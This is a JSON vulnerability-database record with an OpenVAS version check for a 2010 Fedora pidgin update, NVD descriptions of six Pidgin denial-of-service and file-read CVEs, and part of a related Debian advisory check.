{"pluginID": "1361412562310862297", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for pidgin FEDORA-2010-11315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Pidgin allows you to talk to anyone using a variety of messaging\n protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu,\n ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and\n Zephyr. These protocols are implemented using a modular, easy to\n use design. To use a protocol, just add an account using the\n account editor.\n\n Pidgin supports many common features of other clients, as well as many\n unique features, such as perl scripting, TCL scripting and C plugins.\n \n Pidgin is not affiliated with or endorsed by America Online, Inc.,\n Microsoft Corporation, Yahoo! Inc., or ICQ Inc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"pidgin on Fedora 12\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-July/044628.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862297\");\n script_version(\"$Revision: 8469 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 08:58:21 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-02 12:38:17 +0200 (Mon, 02 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-11315\");\n script_cve_id(\"CVE-2010-2528\", \"CVE-2010-1624\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\", \"CVE-2010-0013\");\n script_name(\"Fedora Update for pidgin FEDORA-2010-11315\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of pidgin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.7.2~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "history": [], "description": "Check for the Version of pidgin", "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862297", "type": "openvas", "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "3658421793d2f5b363bbda9c74eb8ca2"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "acc9b66136f23b6a0c0cbb5dc734c6d4"}, {"key": "href", "hash": "9f66d7be50ef5aa24b1efc7026531db3"}, {"key": "modified", "hash": "8acef1c33f73aafdb7cffe84eda8c2b1"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "bfcfc88f853c73b937576ae054875f72"}, {"key": "published", "hash": "40f37fe8cb81012fec588dd007656635"}, {"key": "references", "hash": "d89b406ca56396b14c248f5d5c077cc2"}, {"key": "reporter", "hash": "82db6d7eefdc19955bb78be9fb178ae1"}, {"key": "sourceData", "hash": "d4d6760ee43ebed594db484565d71010"}, {"key": "title", "hash": "ac2839b5abf6fb86929b8a1257de32e0"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "viewCount": 0, "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-July/044628.html", "2010-11315"], "lastseen": "2018-01-19T15:05:23", "published": "2010-08-02T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "cvelist": ["CVE-2010-0420", "CVE-2010-1624", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277", "CVE-2010-2528"], "id": "OPENVAS:1361412562310862297", "hash": "51488b9b22a673d30dcd75597e830c06ef04f65dc8a9e7dde2704ab3b8378ed5", "modified": "2018-01-19T00:00:00", "title": "Fedora Update for pidgin FEDORA-2010-11315", "edition": 1, "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "bulletinFamily": "scanner", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}}

{"result": {"cve": [{"lastseen": "2017-09-19T13:36:51", "references": ["http://www.ubuntu.com/usn/USN-902-1", "http://www.vupen.com/english/advisories/2010/0413", "http://www.securityfocus.com/bid/38294", "http://pidgin.im/news/security/?id=44", "http://www.vupen.com/english/advisories/2010/0914", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035409.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035347.html", "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.html", "http://developer.pidgin.im/wiki/ChangeLog", "https://exchange.xforce.ibmcloud.com/vulnerabilities/56399", "http://www.vupen.com/english/advisories/2010/1020", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035332.html", "https://rhn.redhat.com/errata/RHSA-2010-0115.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:041", "https://bugzilla.redhat.com/show_bug.cgi?id=565786", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:085", "http://www.debian.org/security/2010/dsa-2038"], "description": "libpurple in Finch in Pidgin before 2.6.6, when an XMPP multi-user chat (MUC) room is used, does not properly parse nicknames containing <br> sequences, which allows remote attackers to cause a denial of service (application crash) via a crafted nickname.", "edition": 3, "reporter": "NVD", "published": "2010-02-24T13:30:00", "title": "CVE-2010-0420", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:51", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11485", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11485"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-0420"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11485", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11485"}], "modified": "2017-09-18T21:30:23", "cpe": ["cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.9", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.7", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.6.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.5.8", "cpe:/a:pidgin:pidgin:2.6.5", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.6.1", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.6", "cpe:/a:pidgin:pidgin:2.6.0", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.6.2", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2010-0420", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0420", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-19T13:36:56", "references": ["http://developer.pidgin.im/viewmtn/revision/diff/884d44222e8c81ecec51c25e07d005e002a5479b/with/894460d22c434e73d60b71ec031611988e687c8b/libpurple/protocols/msn/slp.c", "http://www.vupen.com/english/advisories/2010/2755", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:097", "http://www.redhat.com/support/errata/RHSA-2010-0788.html", "http://www.securityfocus.com/bid/40138", "http://www.vupen.com/english/advisories/2010/1141", "http://developer.pidgin.im/viewmtn/revision/info/894460d22c434e73d60b71ec031611988e687c8b", "https://exchange.xforce.ibmcloud.com/vulnerabilities/58559", "http://www.ubuntu.com/usn/USN-1014-1", "https://bugzilla.redhat.com/show_bug.cgi?id=589973", "http://www.pidgin.im/news/security/index.php?id=46"], "description": "The msn_emoticon_msg function in slp.c in the MSN protocol plugin in libpurple in Pidgin before 2.7.0 allows remote authenticated users to cause a denial of service (NULL pointer dereference and application crash) via a custom emoticon in a malformed SLP message.", "edition": 3, "reporter": "NVD", "published": "2010-05-14T15:30:01", "title": "CVE-2010-1624", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:56", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:18547", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A18547"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-1624"], "scanner": [], "modified": "2017-09-18T21:30:47", "cpe": ["cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.5.3:32_bit", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.5:32_bit", "cpe:/a:pidgin:pidgin:2.5.9", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.0.2::linux", "cpe:/a:pidgin:pidgin:2.5.7", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.4.3:32_bit", "cpe:/a:pidgin:pidgin:2.6.6", "cpe:/a:pidgin:pidgin", "cpe:/a:pidgin:pidgin:2.6.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.5.8", "cpe:/a:pidgin:pidgin:2.5.2:32_bit", "cpe:/a:pidgin:pidgin:2.6.5", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.5.0:32_bit", "cpe:/a:pidgin:pidgin:2.6.1", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.4.1:32_bit", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.6", "cpe:/a:pidgin:pidgin:2.6.0", "cpe:/a:pidgin:pidgin:2.5.4:32_bit", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.4.0:32_bit", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.6.2", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.4.2:32_bit", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2010-1624", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1624", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-19T13:36:49", "references": ["http://d.pidgin.im/viewmtn/revision/info/c64a1adc8bda2b4aeaae1f273541afbc4f71b810", "http://lists.fedoraproject.org/pipermail/package-announce/2010-January/033848.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-January/033771.html", "http://www.openwall.com/lists/oss-security/2010/01/07/2", "http://sunsolve.sun.com/search/document.do?assetkey=1-66-277450-1", "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.html", "http://www.vupen.com/english/advisories/2009/3662", "http://d.pidgin.im/viewmtn/revision/info/3d02401cf232459fc80c0837d31e05fae7ae5467", "http://developer.pidgin.im/viewmtn/revision/diff/3d02401cf232459fc80c0837d31e05fae7ae5467/with/c64a1adc8bda2b4aeaae1f273541afbc4f71b810/libpurple/protocols/msn/slp.c", "http://www.openwall.com/lists/oss-security/2010/01/02/1", "https://bugzilla.redhat.com/show_bug.cgi?id=552483", "http://d.pidgin.im/viewmtn/revision/info/4be2df4f72bd8a55cdae7f2554b73342a497c92f", "http://www.vupen.com/english/advisories/2009/3663", "http://www.openwall.com/lists/oss-security/2010/01/07/1", "http://sunsolve.sun.com/search/document.do?assetkey=1-77-1022203.1-1", "http://www.vupen.com/english/advisories/2010/1020", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:085", "http://events.ccc.de/congress/2009/Fahrplan/events/3596.en.html"], "description": "Directory traversal vulnerability in slp.c in the MSN protocol plugin in libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in an application/x-msnmsgrp2p MSN emoticon (aka custom smiley) request, a related issue to CVE-2004-0122. NOTE: it could be argued that this is resultant from a vulnerability in which an emoticon download request is processed even without a preceding text/x-mms-emoticon message that announced availability of the emoticon.", "edition": 2, "reporter": "NVD", "published": "2010-01-09T13:30:01", "title": "CVE-2010-0013", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:49", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10333", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10333"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-0013"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10333", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10333"}], "modified": "2017-09-18T21:30:09", "cpe": ["cpe:/a:adium:adium:1.3.8", "cpe:/a:pidgin:pidgin:2.6.4"], "id": "CVE-2010-0013", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0013", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-19T13:36:51", "references": ["http://www.ubuntu.com/usn/USN-902-1", "http://www.vupen.com/english/advisories/2010/0413", "http://www.securityfocus.com/bid/38294", "https://bugzilla.redhat.com/show_bug.cgi?id=565792", "http://www.vupen.com/english/advisories/2010/0914", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035409.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035347.html", "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.html", "http://developer.pidgin.im/wiki/ChangeLog", "https://exchange.xforce.ibmcloud.com/vulnerabilities/56394", "http://www.vupen.com/english/advisories/2010/1020", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035332.html", "https://rhn.redhat.com/errata/RHSA-2010-0115.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:041", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:085", "http://pidgin.im/news/security/?id=45", "http://www.debian.org/security/2010/dsa-2038"], "description": "gtkimhtml.c in Pidgin before 2.6.6 allows remote attackers to cause a denial of service (CPU consumption and application hang) by sending many smileys in a (1) IM or (2) chat.", "edition": 3, "reporter": "NVD", "published": "2010-02-24T13:30:00", "title": "CVE-2010-0423", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:51", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:17554", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A17554"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-0423"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9842", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:9842"}], "modified": "2017-09-18T21:30:23", "cpe": ["cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.9", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.7", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.6.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.5.8", "cpe:/a:pidgin:pidgin:2.6.5", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.6.1", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.6", "cpe:/a:pidgin:pidgin:2.6.0", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.6.2", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2010-0423", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0423", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-19T13:36:50", "references": ["http://www.ubuntu.com/usn/USN-902-1", "http://www.vupen.com/english/advisories/2010/0413", "http://www.securityfocus.com/bid/38294", "http://www.openwall.com/lists/oss-security/2010/01/07/2", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035409.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035347.html", "http://blogs.sun.com/security/entry/cve_2010_0277_malformed_msn", "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.html", "http://developer.pidgin.im/wiki/ChangeLog", "http://pidgin.im/news/security/?id=43", "http://www.vupen.com/english/advisories/2010/1020", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035332.html", "https://rhn.redhat.com/errata/RHSA-2010-0115.html", "http://www.vupen.com/english/advisories/2010/2693", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:041", "https://bugzilla.redhat.com/show_bug.cgi?id=554335", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:085", "http://events.ccc.de/congress/2009/Fahrplan/events/3596.en.html"], "description": "slp.c in the MSN protocol plugin in libpurple in Pidgin before 2.6.6, including 2.6.4, and Adium 1.3.8 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed MSNSLP INVITE request in an SLP message, a different issue than CVE-2010-0013.", "edition": 2, "reporter": "NVD", "published": "2010-01-09T13:30:01", "title": "CVE-2010-0277", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:50", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:18348", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A18348"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-0277"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9421", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:9421"}], "modified": "2017-09-18T21:30:21", "cpe": ["cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:adium:adium:1.3.8", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.9", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.7", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.6.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.5.8", "cpe:/a:pidgin:pidgin:2.6.5", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.6.1", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.6", "cpe:/a:pidgin:pidgin:2.6.0", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.6.2", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2010-0277", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0277", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-19T13:37:00", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/60566", "http://www.pidgin.im/news/security/index.php?id=47", "http://www.vupen.com/english/advisories/2010/1887", "http://developer.pidgin.im/viewmtn/revision/info/8e8ff246492e45af8f8d0808296d6f2906794dc0", "http://www.vupen.com/english/advisories/2010/2221", "http://www.securityfocus.com/bid/41881", "http://slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.462873", "http://developer.pidgin.im/viewmtn/revision/diff/fcb70f7c12120206d30ad33223ff85be7b226d1c/with/8e8ff246492e45af8f8d0808296d6f2906794dc0/libpurple/protocols/oscar/family_icbm.c"], "description": "The clientautoresp function in family_icbm.c in the oscar protocol plugin in libpurple in Pidgin before 2.7.2 allows remote authenticated users to cause a denial of service (NULL pointer dereference and application crash) via an X-Status message that lacks the expected end tag for a (1) desc or (2) title element.", "edition": 3, "reporter": "NVD", "published": "2010-07-30T09:26:15", "title": "CVE-2010-2528", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:00", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:18359", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A18359"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-2528"], "scanner": [], "modified": "2017-09-18T21:31:01", "cpe": ["cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.9", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.7", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.7.0", "cpe:/a:pidgin:pidgin:2.6.6", "cpe:/a:pidgin:pidgin:2.6.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.5.8", "cpe:/a:pidgin:pidgin:2.6.5", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.6.1", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.6", "cpe:/a:pidgin:pidgin:2.7.1", "cpe:/a:pidgin:pidgin:2.6.0", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.6.2", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2010-2528", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2528", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-01-18T11:04:40", "references": [], "pluginID": "136141256231067400", "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 2038-2.", "edition": 1, "reporter": "Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com", "published": "2010-06-03T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2038-2 (pidgin)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423"], "modified": "2018-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231067400", "id": "OPENVAS:136141256231067400", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2038_2.nasl 8440 2018-01-17 07:58:46Z teissa $\n# Description: Auto-generated from advisory DSA 2038-2 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The packages for Pidgin released as DSA 2038-1 had a regression, as they\nunintentionally disabled the Zephyr instant messaging protocol. This\nupdate restores Zephyr functionality. For reference the original\nadvisory text below.\n\nSeveral remote vulnerabilities have been discovered in Pidgin, a multi\nprotocol instant messaging client. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2010-0420\n\nCrafted nicknames in the XMPP protocol can crash Pidgin remotely.\n\nCVE-2010-0423\n\nRemote contacts may send too many custom smilies, crashing Pidgin.\n\nSince a few months, Microsoft's servers for MSN have changed the protocol,\nmaking Pidgin non-functional for use with MSN. It is not feasible to port\nthese changes to the version of Pidgin in Debian Lenny. This update\nformalises that situation by disabling the protocol in the client. Users\nof the MSN protocol are advised to use the version of Pidgin in the\nrepositories of www.backports.org.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.4.3-4lenny7.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.6.6-1.\n\nWe recommend that you upgrade your pidgin package.\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory DSA 2038-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202038-2\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.67400\");\n script_version(\"$Revision: 8440 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 08:58:46 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-03 22:55:24 +0200 (Thu, 03 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n 